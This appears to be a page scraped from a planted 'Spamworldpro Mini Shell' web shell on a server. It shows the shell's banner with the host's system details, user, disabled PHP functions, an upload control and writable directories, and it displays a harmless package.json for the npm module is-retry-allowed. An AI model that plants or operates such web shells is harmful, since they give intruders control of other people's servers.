Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/ts.corals.io/frontend/node_modules/is-retry-allowed/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/corals/ts.corals.io/frontend/node_modules/is-retry-allowed/package.json
{
	"name": "is-retry-allowed",
	"version": "2.2.0",
	"description": "Check whether a request can be retried based on the `error.code`",
	"license": "MIT",
	"repository": "sindresorhus/is-retry-allowed",
	"funding": {
		"url": "https://github.com/sponsors/sindresorhus"
	},
	"author": {
		"name": "Sindre Sorhus",
		"email": "[email protected]",
		"url": "sindresorhus.com"
	},
	"engines": {
		"node": ">=10"
	},
	"scripts": {
		"test": "xo && ava && tsd"
	},
	"files": [
		"index.js",
		"index.d.ts"
	],
	"keywords": [
		"retry",
		"retries",
		"allowed",
		"check",
		"http",
		"https",
		"request",
		"fetch"
	],
	"devDependencies": {
		"ava": "^3.14.0",
		"tsd": "^0.14.0",
		"xo": "^0.36.1"
	}
}

Spamworldpro Mini